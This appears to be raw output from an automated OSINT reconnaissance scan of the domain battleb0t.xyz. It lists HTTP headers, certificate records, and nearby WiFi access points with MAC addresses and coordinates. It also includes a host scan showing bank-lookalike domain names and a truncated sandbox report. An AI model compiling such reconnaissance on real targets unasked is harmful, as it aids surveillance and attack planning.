| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Led Zeppelin (Net ID: 00:01:24:F1:B5:5B) | 34.0544, -118.244 |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 3 | 0 | None | Google App Engine: https://cloud.google.com/appengine | 104.196.30.220 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | LALOFT (Net ID: 00:01:95:7C:7F:2C) | 34.0544, -118.244 |
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:50c0:8002::153 | battleb0t.xyz |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-256-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 02:52:56 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://size.scrollerwidth/e.renderer.layerconfig.characterwidth+6);if(t.meta&&(r-=t.meta.length),t.caption.length', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://makeresults.alacrity.dev/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2444"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_98c_IE_EarlyTabStart_0xa34_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_98c_ConnHashTable<2444>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_98c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_98c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "IsoScope_98c_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_98c_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2444"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"makeresults.alacrity.dev"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df63e2b842598037d9.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{47750809-ea4a-11ed-855a-0800272bb261}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df14f61ad00e5e098b.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{4775080b-ea4a-11ed-855a-0800272bb261}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{47750809-ea4a-11ed-855a-0800272bb261}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df63e2b842598037d9.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "2.bddcda81.chunk_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "CabCFAF.tmp" has type "data"- Location: [%TEMP%\\CabCFAF.tmp]- [targetUID: 00000000-00002860]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002444]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF63E2B842598037D9.TMP" has type "data"- Location: [%TEMP%\\~DF63E2B842598037D9.TMP]- [targetUID: 00000000-00002444]\n "~DF14F61AD00E5E098B.TMP" has type "data"- Location: [%TEMP%\\~DF14F61AD00E5E098B.TMP]- [targetUID: 00000000-00002444]\n "~DF84D00D0A0D2FCBCA.TMP" has type "data"- Location: [%TEMP%\\~DF84D00D0A0D2FCBCA.TMP]- [targetUID: 00000000-00002444]\n "~DF6B412EB168FE133E.TMP" has type "data"- Location: [%TEMP%\\~DF6B412EB168FE133E.TMP]- [targetUID: 00000000-00002444]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00002444]\n "main.5d62b951.chunk_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._47750809-EA4A-11ED-855A-0800272BB261_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_52029E7A-EA4A-11ED-855A-0800272BB261_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_4775080B-EA4A-11ED-855A-0800272BB261_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 256x256 with PNG image data 256 x 256 8-bit gray+alpha non-interlaced 32 bits/pixel"- [targetUID: N/A]\n "9DUANZNV.htm" has type "HTML document ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\9DUANZNV.htm]- [targetUID: 00000000-00002860]\n "6XWCZL0Y.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6XWCZL0Y.txt]- [targetUID: 00000000-00002444]\n "GKERXAWU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GKERXAWU.txt]- [targetUID: 00000000-00002444]\n "main.2d6f724b.chunk_1_.css" has type "ASCII text with very long lines"- [targetUID: 